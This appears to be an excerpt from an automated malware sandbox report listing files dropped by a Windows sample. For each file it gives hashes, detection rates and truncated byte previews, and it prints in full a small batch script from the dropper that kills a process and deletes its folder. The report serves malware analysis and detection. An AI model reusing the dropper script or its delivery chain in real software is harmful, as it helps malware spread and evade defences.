                                                                                                                                                                                                                                                SHA1:7BD741B3EAC3CF5C17E50957F6AE79202921F5C8
                                                                                                                                                                                                                                                SHA-256:FF33ED675DE449450940132FA1033C7174BC3DF9D1D4A226905F3C8709634C04
                                                                                                                                                                                                                                                SHA-512:DB05274CFEEF8149FB9B937C2A90019201BD0D76C507CD2559D4D8AC9A907C4AF8217AC371A9C71096052AE9AF07741CF77C43FF181157304EEF4D67AABE217F
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...r'\g..........".................w.............@......................................@...@.......@.....................d...|....@...L.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....L...@...N..................@..@.reloc...u.......v...B..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1794560
                                                                                                                                                                                                                                                Entropy (8bit):7.944445137636028
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:CVKMu/yNFoaA4qpe23gB4CrPJlWZhVjFcn7j:C8Mu/SENpyB46hQZHFcnP
                                                                                                                                                                                                                                                MD5:BD77AFDA9F7533654B270DC7196689CF
                                                                                                                                                                                                                                                SHA1:6486841C00452279EF7DBE6716925EA0F58E6EC1
                                                                                                                                                                                                                                                SHA-256:1E327FF9E5867B053C7DA23E53375FB7E79E150F98F9E8E4A5A2EA47A7BB25A2
                                                                                                                                                                                                                                                SHA-512:50BEAF2650BA6A389D886105844E6027099AD5BEAB32FF726064458C6EDA312D4149A39E1400050CD7B64B589953E5E48486302A1743B4A45709B290C0FCE8F2
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................*........h...........@...........................h.....H.....@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@... ..*...$......|..............@...hkzervik......N......~..............@...xvdziszc......h......:..............@....taggant.0....h.."...@..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2817536
                                                                                                                                                                                                                                                Entropy (8bit):6.519620161804985
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:VXbwLbKzVefYyGW0OAPEFT/gREK9COioEzSKD:5bwLbKzVNyGW0bEJIRn8uKD
                                                                                                                                                                                                                                                MD5:B0B3FC8A43169DD5D7E252EF410E48B5
                                                                                                                                                                                                                                                SHA1:ECB35C0F2C89E093006C341001D31FD53E9C9986
                                                                                                                                                                                                                                                SHA-256:3324A620600AAC9B552C5AF9022A1FA755ADF355DA9CA79EDA97E40B7E44F10B
                                                                                                                                                                                                                                                SHA-512:EC6B8B13539A404F20DD5B0210CEE45240CFA68146332485B45253C66CA900C431DA848E2A9D5A43BB65969F71663D75FE87D8C8D8C6116FF9E747B339563EEA
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$...........`+.. ...`....@.. ........................+.......+...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...qufopntd..*.......*..:..............@...phedmodh. ...@+.......*.............@....taggant.@...`+.."....*.............@...................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1968640
                                                                                                                                                                                                                                                Entropy (8bit):7.9330340654828095
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:uv8V2T+34LyPayMriAtDEMH6a62D6WEDKrH:9VYfyiZ79t6WEa
                                                                                                                                                                                                                                                MD5:C371507551999618FA1DCEB764333BC0
                                                                                                                                                                                                                                                SHA1:E71870305AD13FEF36B85E5A3CD8E038525F994C
                                                                                                                                                                                                                                                SHA-256:0FB1F2F159E36668C4480491AE8B05FE3F8FD28BEEB933D46CF10BA3343256B6
                                                                                                                                                                                                                                                SHA-512:758E15B5EDC9DB3D060F52A6F0B8CAF07A03523905AD15D4A944B9C2C025545C4B498B22C2AD92A9781235E7A450C2608E40FFFD98F1F764334D02CF3B2F243E
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!J..@$..@$..@$......@$......@$......@$..._..@$..@%..@$......@$......@$......@$.Rich.@$.........PE..L......d..........................................@.................................J8......................................Z.B.n.....@.h!..................................................x....................................................... . ..@......T..................@....rsrc...h!....@......d..............@....idata ......B.....................@... .`).. B.....................@...awzrkizh......k.....................@...dziymjtb.....p......................@....taggant.0......."..................@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4438776
                                                                                                                                                                                                                                                Entropy (8bit):7.99505709582503
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
                                                                                                                                                                                                                                                MD5:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                                                                                SHA1:7B50E108E293E54C15DCE816552356F424EEA97A
                                                                                                                                                                                                                                                SHA-256:BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
                                                                                                                                                                                                                                                SHA-512:A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):727552
                                                                                                                                                                                                                                                Entropy (8bit):7.888061454157426
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:tyNudyx57oPuBlhyyZzWDtkfDdEIHiyO+rBlhyyZzWDtkfDdEIHiyO+N:t+3x5s2BCyqXIdXBCyqXId5
                                                                                                                                                                                                                                                MD5:28E568616A7B792CAC1726DEB77D9039
                                                                                                                                                                                                                                                SHA1:39890A418FB391B823ED5084533E2E24DFF021E1
                                                                                                                                                                                                                                                SHA-256:9597798F7789ADC29FBE97707B1BD8CA913C4D5861B0AD4FDD6B913AF7C7A8E2
                                                                                                                                                                                                                                                SHA-512:85048799E6D2756F1D6AF77F34E6A1F454C48F2F43042927845931B7ECFF2E5DE45F864627A3D4AA061252401225BBB6C2CAA8532320CCBE401E97C9C79AC8E5
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....$Xg.................N..........,6............@..........................P......|z....@.................................l...d...................................................................8h..............4...d............................text...AM.......N.................. ..`.rdata..<~...`.......V..............@..@.data...L...........................@....rsrc...............................@..@.reloc..............................@..B.bss.........0......................@....bss................................@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1177600
                                                                                                                                                                                                                                                Entropy (8bit):6.818135641587018
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:oV8u1dJPHRQTAVWpiUHeAHLnVUcatjj/KP/2kq/967kI:oNFRbMHLycKTKP/2kW67kI
                                                                                                                                                                                                                                                MD5:42A8588CC82773CD223C42F8FE4BE91A
                                                                                                                                                                                                                                                SHA1:E2ED3CDA00140ECD445F5F742729D34F2C452C8C
                                                                                                                                                                                                                                                SHA-256:D4521C34F489F4A6065DEA15634DF9BB700C84741F476BDE1084D9CDFB373A7B
                                                                                                                                                                                                                                                SHA-512:681E4B155CE1015723469BD819618B292844AA00F7DAB447D9557E244792EFCEF5614F753283EFE9DD76EA77B838AF78A3E69008C380482A4412B1CEA75C535D
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...._Hg.............................!............@..........................`.......#....@.................................<...T...................................L...8...............................@...............t............................text............................... ..`.rdata..*...........................@..@.data...............................@....reloc...............R..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3223040
                                                                                                                                                                                                                                                Entropy (8bit):6.589089679322374
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:yZ1m9In5PVRjbnKSoNK1yoJFk/yUXeo7HH4MBQC+kQFw:yZ0In9V1nKR4yiFkqUX0C+9w
                                                                                                                                                                                                                                                MD5:197F7A10814E446EE3D649F2509B1608
                                                                                                                                                                                                                                                SHA1:A459EC5320318E01318105D8E87E707EA480A4C7
                                                                                                                                                                                                                                                SHA-256:B4AB50C0C3A89046764D4B805C9C4CF5CBE6AE07AA2EDDB5E445C11479A912CE
                                                                                                                                                                                                                                                SHA-512:B595F5B8DE7ECF96CB18F9F1DE10BBB4988BB9B6412E1837B49469B78F7F15BBAE661B8092B1D46FA6D2BDFEAA5F0E8E0F493C70DBE7D94C66CBA325D83E6C85
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................01...........@..........................`1.......2...@.................................W...k.......H...................<.1...............................1..................................................... . ............................@....rsrc...H...........................@....idata ............................@...utqttalq.p*......p*.................@...cjsrlafd..... 1.......1.............@....taggant.0...01.."....1.............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                Size (bytes):26
                                                                                                                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\7z.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1679360
                                                                                                                                                                                                                                                Entropy (8bit):6.278252955513617
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
                                                                                                                                                                                                                                                MD5:72491C7B87A7C2DD350B727444F13BB4
                                                                                                                                                                                                                                                SHA1:1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
                                                                                                                                                                                                                                                SHA-256:34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
                                                                                                                                                                                                                                                SHA-512:583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\7z.exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):468992
                                                                                                                                                                                                                                                Entropy (8bit):6.157743912672224
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
                                                                                                                                                                                                                                                MD5:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                SHA1:6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
                                                                                                                                                                                                                                                SHA-256:344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
                                                                                                                                                                                                                                                SHA-512:2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\KillDuplicate.cmd

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):222
                                                                                                                                                                                                                                                Entropy (8bit):4.855194602218789
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
                                                                                                                                                                                                                                                MD5:68CECDF24AA2FD011ECE466F00EF8450
                                                                                                                                                                                                                                                SHA1:2F859046187E0D5286D0566FAC590B1836F6E1B7
                                                                                                                                                                                                                                                SHA-256:64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
                                                                                                                                                                                                                                                SHA-512:471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\extracted\AntiAV.data

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2355713
                                                                                                                                                                                                                                                Entropy (8bit):5.891648193754473
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:5yZBPkpRrP9pxC+XvoflcYy36s3vb0EecYy37n92k8GtGAQZ67hR7krC/Cyf0/xO:R9kqGu7okoZscCnf0/Zs9p
                                                                                                                                                                                                                                                MD5:579A63BEBCCBACAB8F14132F9FC31B89
                                                                                                                                                                                                                                                SHA1:FCA8A51077D352741A9C1FF8A493064EF5052F27
                                                                                                                                                                                                                                                SHA-256:0AC3504D5FA0460CAE3C0FD9C4B628E1A65547A60563E6D1F006D17D5A6354B0
                                                                                                                                                                                                                                                SHA-512:4A58CA0F392187A483B9EF652B6E8B2E60D01DAA5D331549DF9F359D2C0A181E975CF9DF79552E3474B9D77F8E37A1CF23725F32D4CDBE4885E257A7625F7B1F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\extracted\file_6.zip

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1800364
                                                                                                                                                                                                                                                Entropy (8bit):7.997716835838842
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:49152:kyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJv:lj13Trb6i5iGmuXZTbBizt0Jht
                                                                                                                                                                                                                                                MD5:0DC4014FACF82AA027904C1BE1D403C1
                                                                                                                                                                                                                                                SHA1:5E6D6C020BFC2E6F24F3D237946B0103FE9B1831
                                                                                                                                                                                                                                                SHA-256:A29DDD29958C64E0AF1A848409E97401307277BB6F11777B1CFB0404A6226DE7
                                                                                                                                                                                                                                                SHA-512:CBEEAD189918657CC81E844ED9673EE8F743AED29AD9948E90AFDFBECACC9C764FBDBFB92E8C8CEB5AE47CEE52E833E386A304DB0572C7130D1A54FD9C2CC028
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:PK........n..Y..+..x...x......file_5.zipPK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\extracted\file_7.zip

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3473559
                                                                                                                                                                                                                                                Entropy (8bit):7.9992359395959935
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:98304:8aR3D0Ae5mwdkDWm1Xo4j13Trb6i5iGmuXZTbBizt0Jhd:ds5m6sXoArb6iguZnBi5Qd
                                                                                                                                                                                                                                                MD5:CEA368FC334A9AEC1ECFF4B15612E5B0
                                                                                                                                                                                                                                                SHA1:493D23F72731BB570D904014FFDACBBA2334CE26
                                                                                                                                                                                                                                                SHA-256:07E38CAD68B0CDBEA62F55F9BC6EE80545C2E1A39983BAA222E8AF788F028541
                                                                                                                                                                                                                                                SHA-512:BED35A1CC56F32E0109EA5A02578489682A990B5CEFA58D7CF778815254AF9849E731031E824ADBA07C86C8425DF58A1967AC84CE004C62E316A2E51A75C8748
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:PK........n..Y`.T......#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..|...$..}.`..8......lV1*..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T....*..A..|...{A.p{.b*.|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.|.g....&.d..Y.|..5O...s.|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\file.bin

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exe
                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3473725
                                                                                                                                                                                                                                                Entropy (8bit):7.999948676888215
                                                                                                                                                                                                                                                Encrypted:true
